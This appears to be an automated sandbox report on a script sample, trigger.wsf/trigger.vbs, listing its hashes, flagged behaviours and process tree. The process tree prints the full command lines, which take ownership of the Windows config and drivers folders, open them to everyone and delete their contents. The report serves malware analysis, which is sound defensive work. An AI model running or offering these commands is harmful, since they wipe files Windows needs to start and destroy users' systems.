Analysis
-
max time kernel
93s -
max time network
95s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
15-08-2024 21:18
Static task
static1
Behavioral task
behavioral1
Sample
trigger.wsf
Resource
win10v2004-20240802-en
0 signatures
150 seconds
General
-
Target
trigger.wsf
-
Size
1KB
-
MD5
a5db60d9ff56ef8720d8ed2d9e3d1c40
-
SHA1
edf26211e76a660f1b4d514000f5b2b12b0b4441
-
SHA256
22ddb640309560907cba8c9dc61f15929a88952043411cb95a707fd44a238282
-
SHA512
f1437706f46e3e3daaed930c5c12ea1f05e947ab691083ac9968357e84034d9f99ffb07fc3d8fea36d04a12ff4adf133f93aa931e1b9fec9ef9e509eabc9244b
Malware Config
Signatures
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exepid process 920 icacls.exe 3772 takeown.exe 1888 takeown.exe 2784 icacls.exe 652 icacls.exe 2184 takeown.exe 3384 takeown.exe 2860 icacls.exe -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
takeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exepid process 3384 takeown.exe 2860 icacls.exe 920 icacls.exe 3772 takeown.exe 1888 takeown.exe 2784 icacls.exe 652 icacls.exe 2184 takeown.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
takeown.exedescription pid process Token: SeTakeOwnershipPrivilege 3384 takeown.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
WScript.execmd.execmd.exeWScript.execmd.execmd.exedescription pid process target process PID 5032 wrote to memory of 1720 5032 WScript.exe cmd.exe PID 5032 wrote to memory of 1720 5032 WScript.exe cmd.exe PID 5032 wrote to memory of 3744 5032 WScript.exe cmd.exe PID 5032 wrote to memory of 3744 5032 WScript.exe cmd.exe PID 1720 wrote to memory of 2184 1720 cmd.exe takeown.exe PID 1720 wrote to memory of 2184 1720 cmd.exe takeown.exe PID 3744 wrote to memory of 3384 3744 cmd.exe takeown.exe PID 3744 wrote to memory of 3384 3744 cmd.exe takeown.exe PID 1720 wrote to memory of 2860 1720 cmd.exe icacls.exe PID 1720 wrote to memory of 2860 1720 cmd.exe icacls.exe PID 3744 wrote to memory of 920 3744 cmd.exe icacls.exe PID 3744 wrote to memory of 920 3744 cmd.exe icacls.exe PID 3476 wrote to memory of 1768 3476 WScript.exe cmd.exe PID 3476 wrote to memory of 1768 3476 WScript.exe cmd.exe PID 3476 wrote to memory of 2424 3476 WScript.exe cmd.exe PID 3476 wrote to memory of 2424 3476 WScript.exe cmd.exe PID 1768 wrote to memory of 3772 1768 cmd.exe takeown.exe PID 1768 wrote to memory of 3772 1768 cmd.exe takeown.exe PID 2424 wrote to memory of 1888 2424 cmd.exe takeown.exe PID 2424 wrote to memory of 1888 2424 cmd.exe takeown.exe PID 2424 wrote to memory of 2784 2424 cmd.exe icacls.exe PID 2424 wrote to memory of 2784 2424 cmd.exe icacls.exe PID 1768 wrote to memory of 652 1768 cmd.exe icacls.exe PID 1768 wrote to memory of 652 1768 cmd.exe icacls.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\trigger.wsf"1⤵PID:2556
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1064
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\trigger.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\config\*3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2184
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\config\* /grant everyone:(f)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:3744 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\drivers\*3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3384
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\drivers\* /grant everyone:(f)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:920
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\trigger.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:3476 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\config\*3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3772
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\config\* /grant everyone:(f)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\drivers\*3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1888
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\drivers\* /grant everyone:(f)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2784
-
-